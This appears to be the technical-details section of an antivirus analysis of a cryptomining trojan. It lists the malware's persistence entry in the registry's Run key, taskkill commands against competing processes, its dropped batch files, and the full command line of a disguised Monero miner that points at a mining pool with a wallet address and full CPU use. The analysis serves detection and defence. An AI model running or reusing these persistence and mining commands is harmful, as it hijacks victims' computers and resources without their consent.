Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'AppDatas.exe' = '<SYSTEM32>\AppDatas.exe'
- '<SYSTEM32>\taskkill.exe' /F /IM AppData.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM AppDatas.exe /T
- '<SYSTEM32>\taskkill.exe' /F /IM <File name>.exe
- <Current directory>\Kill.bat
- <SYSTEM32>\AppDatas.exe
- <Current directory>\cmd.bat
- <SYSTEM32>\VC6linker.exe
- 'mi##.ppxxmr.com':443
- DNS ASK mi##.ppxxmr.com
- ClassName: '' WindowName: ''
- '<SYSTEM32>\AppDatas.exe'
- '<SYSTEM32>\VC6linker.exe' -B -o stratum+tcp://mine.ppxxmr.com:443 -u 43VZF7BUbP2CLYGC6CGo6iMSWtCHtkTmLF5Hy7Trkd59G1ZoSuKUjp5ij9942shw9X3Pdx36r2kMLaAuZT4BXp1DSjBrrJT -p x -k --max-cpu-usage=100 --donate-level=1
- '<SYSTEM32>\cmd.exe' /c Kill.bat
- '<SYSTEM32>\reg.exe' add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "AppDatas.exe" /t REG_SZ /d "<SYSTEM32>\AppDatas.exe" /f
- '<SYSTEM32>\cmd.exe' /c cmd.bat